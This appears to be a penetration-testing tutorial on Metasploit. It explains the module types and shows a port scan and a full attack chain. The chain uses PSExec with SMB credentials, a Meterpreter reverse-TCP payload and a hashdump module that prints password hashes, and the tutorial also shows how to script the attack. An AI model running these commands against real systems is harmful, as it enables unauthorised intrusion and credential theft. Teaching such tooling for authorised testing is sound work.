Metasploit is a suite of tools built into a framework which automates and tracks many of the tasks of a penetration test, plus it integrates nicely with other common Penetration Testing tools like Nessus and Nmap. Metasploit was acquired by Rapid-7 in 2009 and there are now commercial variants however the free framework does provide everything you need for a successful Penetration Test from a command-line interface. If you’re curious of the differences Rapid-7 has a page where you can compare the free version against the commercial version here. Metasploit includes port scanners, exploit code, post-exploitation modules – all sorts!#
If you’d like to get up and running with Metasploit with the least drama possible then Kali Linux is pretty much ready to go out-of-the-box; there’s a page here with some installation notes. If you’re a Fedora Security Spin users there’s an installation guide here.
Once you’re installed you can jump into the Metasploit console with the command:
This command will launch the menu-driven console. There used to a be a separate command “msfcli” which was a scriptable command-line interface however this has been deprecated and is now all available within msfconsole, I’ll give to example usage for the new scriptable interface at the end of this guide.
The msfconsole command will place you in the Metasploit console menu, which will look something like the following (the banner will likely be different:)
_ _ / / __ _ __ /_/ __ | | / | _____ ___ _____ | | / _ | | /| | | ___ |- -| / / __ | -__/ | || | || | |- -| |_| | | | _|__ | |_ / - __ | | | | __/| | | |_ |/ |____/ ___/ / \___/ / __| |_ ___ =[ metasploit v4.11.11-dev-3d1861b ] + -- --=[ 1520 exploits - 881 auxiliary - 259 post ] + -- --=[ 437 payloads - 38 encoders - 8 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] msf >
Metasploit is driven by modules, each tool, piece of exploit code, or payload has its own module which keeps everything uniform and neat.
Within Metasploit there is a hierarchy of menu options with tools, exploit code, post-exploit code all being under a separate branch. This keeps everything neat and makes finding the particular item you’re looking for quite simple. The top level of the hierarchy looks a little like this:
Looking out further from the top level the hierarchy builds up like this:
The above is just a subset of module options to give you a feel for how the framework looks and how it’s laid out.
Auxiliary modules – are used for information gathering, enumeration, port scanning and that sort of thing. There are plenty of useful tools in there too for things like connecting to SQL databases and even tools for performing man-in-the-middle attacks.
Exploit modules – are generally used to deliver exploit code to a target system. It’s worth mentioning that Nessus adds a note to its detected issues if a Metasploit module is available. However you can also perform a search for modules using the search command. Say for example that you know a host is vulnerable to MS08-067 you could use the following command to find an appropriate Metasploit module:
msf > search MS08-067 Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/windows/smb/ms08_067_netapi 2008-10-28 great MS08-067 Microsoft Server Service Relative Path Stack Corruption
So the above search reveals that the exploit module for the vulnerability MS08-067 is exploit/windows/smb/ms06_067_netapi
Post modules – offer post exploitation tools such as the ability to extract password hashes and access tokens and even modules for things like taking a screenshot, key-logging and downloading files.
Payload modules – are used to create malicious payloads for use with an exploit, generally if possible the aim would be to upload a copy of “meterpreter” which is the default payload of metasploit and I’ll add more details about this module in its own section.
Typing “use” will allow you to select a module. For example if you wanted to perform a TCP port scan of a host you could use the command:
msf > use auxiliary/scanner/portscan/tcp
To find out the required configuration for a module you can type “show options”, like this:
msf auxiliary(tcp) > show options Module options (auxiliary/scanner/portscan/tcp): Name Current Setting Required Description ---- --------------- -------- ----------- CONCURRENCY 10 yes The number of concurrent ports to check per host PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900) RHOSTS yes The target address range or CIDR identifier THREADS 1 yes The number of concurrent threads TIMEOUT 1000 yes The socket connect timeout in milliseconds
To set a specific option you can use the set command (or unset to remove a setting), RHOST is the option to specify a desired target so I can set the scanner up like this:
msf auxiliary(tcp) > set RHOSTS 172.31.1.6 RHOSTS => 172.31.1.6
Then all I need to do is type run and the scan will begin!
msf auxiliary(tcp) > run [*] 172.31.1.6: - 172.31.1.6:21 - TCP OPEN [*] 172.31.1.6: - 172.31.1.6:80 - TCP OPEN [*] 172.31.1.6: - 172.31.1.6:443 - TCP OPEN
That’s all there really is to finding and running modules. For more examples of auxiliary modules check out how to Steal Accounts with NetBIOS-NS/LLMNR spoofing.
Exploiting a Host
Things are a touch more complex when it comes to exploiting a host, generally this is a three step process. There is executing an appropriate exploit, uploading an appropriate payload and running post-exploitation modules. So whereas most auxiliary modules are standalone it’s common to see exploit, payload and post all used together.
So to show how I might chain these modules together I have an example here of using the PSExec module to capture password hashes from a machine. I’ve spoken briefly about this before, however here’s just a quick run through of the steps. First of all we would select an exploit module, here I’ll use PSExec to connect to the machine and upload a meterpreter payload before choosing the hashdump post module to capture additional passwords.
So first of all I select the exploit module, check the options it hash available and set the appropriate options:
msf auxiliary(tcp) > use exploit/windows/smb/psexec msf exploit(psexec) > show options Module options (exploit/windows/smb/psexec): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes Set the SMB service port SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing SERVICE_DISPLAY_NAME no The service display name SERVICE_NAME no The service name SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as Exploit target: Id Name -- ---- 0 Automatic msf exploit(psexec) > set SMBUser user SMBUser => user msf exploit(psexec) > set SMBPass password SMBPass => password msf exploit(psexec) > set RHOST 172.20.10.4 RHOST => 172.20.10.4
Once the exploit is set up I choose a payload module. There are many payloads available however wherever possible it’s likely that you’d prefer to choose a “Meterpreter” payload. Options include executing simple commands, injecting VNC to gain a graphical connection to the remote machine, or even getting the machine to speak using text-to-speech!
However Meterpreter is incredibly powerful and includes a whole range of post-exploitation tools. It allows you to pivot from the remote host, perform keylogging, extract hashes. A lot of useful things!
So here I’m selecting a Meterpreter payload and running the exploit to upload the payload to the target:
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(psexec) > run [*] Started reverse TCP handler on 172.20.10.3:4444 [*] 172.20.10.4:445 - Connecting to the server... [*] 172.20.10.4:445 - Authenticating to 172.20.10.4:445 as user 'user'... [*] 172.20.10.4:445 - Selecting PowerShell target [*] 172.20.10.4:445 - Executing the payload... [+] 172.20.10.4:445 - Service start timed out, OK if running a command or non-service executable... [*] Sending stage (957999 bytes) to 172.20.10.4 [*] Meterpreter session 1 opened (172.20.10.3:4444 -> 172.20.10.4:49162) at 2016-02-21 23:33:00 +0000
Now a Meterpreter session has been uploaded, we’ve successfully utilised an exploit and payload module so it’s time for a post-exploitation module. As an example I’ll use smart_hashdump which will capture all of the hashed passwords from the exploited machine’s SAM file:
Post-modules can be chosen through the “run” command as follows:
meterpreter > run post/windows/gather/smart_hashdump [*] Running module against WIN-H64STA52327 [*] Hashes will be saved to the database if one is connected. [*] Hashes will be saved in loot in JtR password file format to: [*] /root/.msf4/loot/20160221233319_default_172.20.10.4_windows.hashes_503075.txt [*] Dumping password hashes... [*] Running as SYSTEM extracting hashes from registry [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY 1f39e60415696dc633e2958032f765d4... [*] Obtaining the user list and keys... [*] Decrypting user keys... [*] Dumping password hints... [*] No users with password hints on this system [*] Dumping password hashes... [+] Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [+] user:1000:aad3b435b51404eeaad3b435b51404ee:7df82f2f64aaaaabbb5c6d67db2cd7c8::: meterpreter >
So that’s basic Metasploit usage! There are four basic types of modules – auxiliary, exploit, payload and post. Modules can be chosen through the use command, configured through the set command and executed through the run command. If your exploit is successful and you’re placed into a Meterpreter session then you have the power of post modules which can be chosen through using the run command followed by a post module name.
That’s really all there is to it; it’s an incredibly powerful and flexible framework but the basic usage is very simple – the tricky part is finding vulnerable machines, but thorough enumeration through auxiliary modules or tools like Nessus this can be automated (and Nessus/Nmap results can even be imported into Metasploit!)
If you find yourself repeating yourself then you can automate common steps through the use of scripts, here’s a quick extra credit section on Scripting with Metasploit:
With Metasploit you can automate tasks that you conduct regularly through scripts. There are two main ways to execute scripts, either to directly invoke the console or within the console itself. Scripting by invoking the console allows you to include Metasploit functionality in a simple way within scripts, such as base scripts. For example you can invoke Metasploit, choose an module, configure options and execute it all by chaining commands with the -x option, like this:
./msfconsole -x "use exploit/windows/smb/psexec; set RHOST 10.1.1.1; set SMBUser user; set SMBPass password; run"
The same can be achieved within the console by utilising a .rc script file, save the following as “example.rc”:
use exploit/windows/smb/psexec set RHOST 10.1.1.1 set SMBUser user set SMBPass password run
You can then execute this script as you invoke the console:
msfconsole -r example.rc
or within the console directly:
That’s it! Basic usage of Metasploit is pretty straight forward, once you’ve gotten to grips with it I highly recommend you check out Metasploit Workspaces!